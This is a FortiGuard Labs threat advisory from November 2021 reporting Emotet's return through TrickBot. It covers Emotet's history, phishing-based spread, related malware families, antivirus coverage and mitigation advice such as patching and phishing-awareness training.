virus logo Threat Signal Report

Resurrection of Emotet Botnet Observed

Description

FortiGuard Labs is aware of reports that the Emotet botnet is making a comeback. Researchers @Cryptolaemus, GData and Advanced Intel have discovered the botnet is back in business by way of the TrickBot botnet. Preliminary reports have surfaced that the TrickBot threat actors were observed dropping a DLL file that was identified as Emotet to its botnets over the weekend.


Approximately ten months ago, law enforcement officials at Europol dismantled the Emotet botnets' command and control infrastructure. Additionally, in April of 2021, law enforcement officials in the Netherlands installed software that would clean up computers that were infected with Emotet on a predetermined date, therefore effectively bringing the botnet to a halt.


According to Luca Ebach, a researcher at GData, it appears that the threat actors behind TrickBot are distributing Emotet in what appears to be an attempt to get the botnet back into action again. This relationship is not new; as FortiGuard Labs covered it here in 2020 taking advantage of the pandemic , and back in 2019 in our Emotet Playbook.


What is Emotet in a Nutshell?

Emotet is classified as a Trojan downloader. Originally a banking Trojan and first discovered in 2014, it has evolved into a modular hybrid Trojan downloader. Emotet is usually sent via spearphishing emails, often attaching a specially crafted Microsoft Office document containing malicious macros. These macros then call a command and control server to download the Emotet payload. It has been noted that Emotet has a symbiotic relationship with TrickBot, and has been observed in the past dropping TrickBot to install ransomware as well.


Emotet is capable of spoofing email threads of trusted senders and hijacking conversations to ingrain itself to unsuspecting victims. This allows it to further propagate to other machines and networks and at the same time, ensure its survival. Other observations are around DLL files that could be injected into various processes to intercept outbound network traffic as well as gathering details within a web browser.


What Malware Family is Emotet Related To?

Emotet is part of a group that includes - and is loosely related to - the Bugat/Feodo/Geodo/Heodo/Cridex/Dridex malware banking families that have had their fair share of publicity over the past several years due to their widespread and destructive campaigns. Emotet has also been seen distributing AZORult, IcedID, ZeuS Panda, and TrickBot malware. Because of this, Emotet gained the attention of the AV industry, law enforcement, and researchers alike for its ability to simultaneously include multiple malware families in its distribution syndicate.


Who are Behind these Groups?

For a malware campaign to be successful over the long term, malware authors have to update their codebase and attack vectors on a regular basis to thwart detection and remediation. This is akin to a full time job, and although we don't have any evidence to the inner workings of these groups, it is evident that these syndicates treat it like a highly successful business with a team of dedicated developers and project leaders - with the only difference being that it is an illegal criminal enterprise.


What is the Status of Coverage?

FortiGuard Labs provides the following AV coverage against this latest version of Emotet as:


PossibleThreat.MU


All network IOC's are blocked by the WebFiltering client.


Any Other Suggested Mitigation?


As it has been observed that TrickBot actors are now redistributing Emotet via its own botnet, it is imperative to be running up to date AV and IPS signatures.


It is also important to ensure that all known vendor vulnerabilities are addressed, and updated to protect from attackers having a foothold within a network. Attackers are well aware of the difficulty of patching and if it is determined that patching is not feasible at this time, an assessment should be conducted to determine risk.


Also - organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spear phishing attacks. They also need to encourage employees to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution. Since it has been reported that various phishing and spear phishing attacks have been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates by an organizations' internal security department. Simple user awareness training on how to spot emails with malicious attachments or links could also help prevent initial access into the network.

description-logoOutbreak Alert

Emotet, a Trojan that is distributed via spam emails, has been prevalent since its first appearance in 2014. With a network made up of multiple botnets, Emotet has continuously sent out spam emails in campaigns designed to infect users via phishing attacks.

View the full Outbreak Alert Report

Appendix

Tweet by Cryptolaemus

Guess Who's back (Cyber WTF blog)


Emotet Resources

Alert (AA20-280A) Emotet Malware (US-CERT)

Feodo Tracker (Abuse.ch)

FortiGuard Labs YouTube video on Emotet (Fortinet)

Attackers Taking Advantage of the Coronavirus/COVID-19 Media Frenzy (Fortinet)

New Variant of TrickBot Being Spread by Word Document (Fortinet)

FortIGuard Labs Emotet Playbook (Fortinet)


ID 69
Date Nov 15, 2021
Outbreak Alert Emotet Malware
Threat/
Vulnerability		 Multiple
FortiGate Device Triggered N/A
Threat Actor Type CyberCrime
Experienced a Breach? We're here to help FortiGuard Incident Response Services
FortiGuard Incident Response Services
Outbreak Alert Outbreak Alert